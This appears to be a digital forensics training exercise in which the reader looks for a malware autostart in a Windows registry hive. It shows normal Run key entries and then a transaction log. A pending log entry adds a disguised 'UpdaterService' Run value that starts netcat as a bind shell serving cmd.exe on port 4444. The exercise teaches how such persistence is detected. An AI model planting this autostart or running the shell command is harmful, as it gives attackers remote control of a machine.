Mission: Locate the persistence mechanism (malware autostart).
Currently viewing the primary hive file. Navigate to Software\Microsoft\Windows\CurrentVersion\Run.
ROOT
Software
Microsoft
Windows
CurrentVersion
Run
RunOnce
Path: \Software\Microsoft\Windows\CurrentVersion\Run
| Name | Type | Data |
|---|---|---|
| OneDrive | REG_SZ | "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background |
| SecurityHealth | REG_EXPAND_SZ | %windir%\system32\SecurityHealthSystray.exe |
No suspicious entries found in current hive view.
Transaction Log Viewer
Format: ASCII DumpSEQ: 1042 | OFFSET: 0x4B20
OP: KEY_ACCESS_UPDATE
PATH: ...\CurrentVersion\Explorer
SEQ: 1043 (PENDING FLUSH)
OFFSET: 0x4F00
OP: SET_VALUE
PATH: ...\CurrentVersion\Run
Name: UpdaterService
Type: REG_SZ
Data: "C:\Temp\nc.exe -L -p 4444 -e cmd.exe"
Type: REG_SZ
Data: "C:\Temp\nc.exe -L -p 4444 -e cmd.exe"
SEQ: 1044 | OFFSET: 0x5010
OP: FLUSH_HIVE_HEADER
STATUS: INTERRUPTED (POWER_FAIL)
Replaying Transaction Logs...
Merging SEQ 1043 into Primary Hive